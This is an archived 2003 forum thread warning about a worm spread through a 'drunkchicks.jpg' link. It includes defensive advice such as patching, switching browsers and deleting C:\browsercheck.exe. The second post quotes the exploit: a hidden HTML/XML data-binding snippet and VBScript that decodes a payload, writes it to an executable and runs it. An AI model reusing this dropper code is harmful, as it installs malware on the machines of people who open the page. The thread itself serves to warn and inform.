Sponsored links

Go Back   MP3Car.com > General > Off Topic


Reply
 
Share Thread Tools Display Modes
Old 09-27-2003, 11:13 AM   #1
jol
FLAC
 
jol's Avatar
 
Join Date: Jan 2002
Location: Mellansel, Sweden
Posts: 1,299
jol is on a distinguished road
New worm/virus drunkchicks.jpg

[16:25] -O- (Broadcast) WARNING: There is a new worm spreading around. If you see a message with a URL that looks like: 'http://www.kromberg.at/<censored>=drunkchicks.jpg LOL' do NOT visit that link. If you have visited it already you have gotten infected, and you are advised to remove c:\browsercheck.exe

here's is the image for you that only uses msiexplore
http://svartis.punkcookies.com/~jol/jol's_desktop.jpg
__________________
-
My cars
-
jol is offline   Reply With Quote
Advertisement
 
Advertisement
Sponsored links

Old 09-27-2003, 11:43 AM   #2
Super Moderator
 
hijinks21's Avatar
 
Join Date: May 2002
Location: Albany, NY
Posts: 1,802
hijinks21 is on a distinguished road
This is the newest IE exploit going around. There's a version of it going around on AIM where you will get a IM from an buddy that has the virus telling you to visit a website.

Simple FIX: DON'T RUN IE. Its sucks and its full of un-patched holes that can lead to problems like this. Some are more then 2 years old. Use mozilla.

Here's the exploit

Code:
<div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2"> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" data="drunkchicks.php"></object> ]]> </exploit> </security> </xml> </div>

that passes you to a drunkchicks.php which opens up the exploit

Here is a section of it

Code:
function res(x,y) For k = 0 To UBound(v) v(k) = Replace(v(k), x, y) Next End Function res "z", "ff" res "y", "00" For m = 0 To UBound(v) it = it & v(m) Next tmp = Split(it, ",") Set WshShell = CreateObject("WScript.Shell") Set WshEnv = WshShell.Environment("Process") pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe" pth = "C:\browsercheck.exe" Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.CreateTextFile(pth, True) For i = 0 To UBound(tmp) l = Len(tmp(i)) b = Int("&H" & Left(tmp(i), 2)) If l > 2 Then r = Int("&H" & Mid(tmp(i), 3, l-2)) For j = 1 To r f.Write Chr(b) Next Else f.Write Chr(b) End If Next f.Close WshShell.run("""" & pth & """")

the payload is encoded. I don't know VB all that well but it looks like simple ascii encoding. If i get bored I'll see if i can decode it
__________________
'98 Explorer Sport
http://mp3car.zcentric.com (down atm)
AMD 800mhz 192megs RAM 60gig hard drive 9 inch widescreen VGA
80% done
hijinks21 is offline   Reply With Quote
Old 09-27-2003, 01:12 PM   #3
FLAC
 
MP3DUB's Avatar
 
Join Date: Jan 2002
Location: Chicagoland, IL
Posts: 1,738
MP3DUB is on a distinguished road
Or you could actually keep IE (and windows for that matter) patched. But Mozilla is good too If only the tabbrowser pluggin worked 100%, I'd have fully switched, as it is, I still run both.
__________________
-Nick

_____________________________
Since when is insanity a bad thing?
Monthly MP3Car Chicago Meets
www.mp3vw.com Last updated: 07/07/2008
MP3DUB is offline   Reply With Quote
Sponsored links
Advertisement
 
Advertisement
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off




All times are GMT -5. The time now is 11:00 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.3.2
Copyright © 1999 - 2008 Mp3Car.com Inc.Ad Management by RedTyger
Message Board Statistics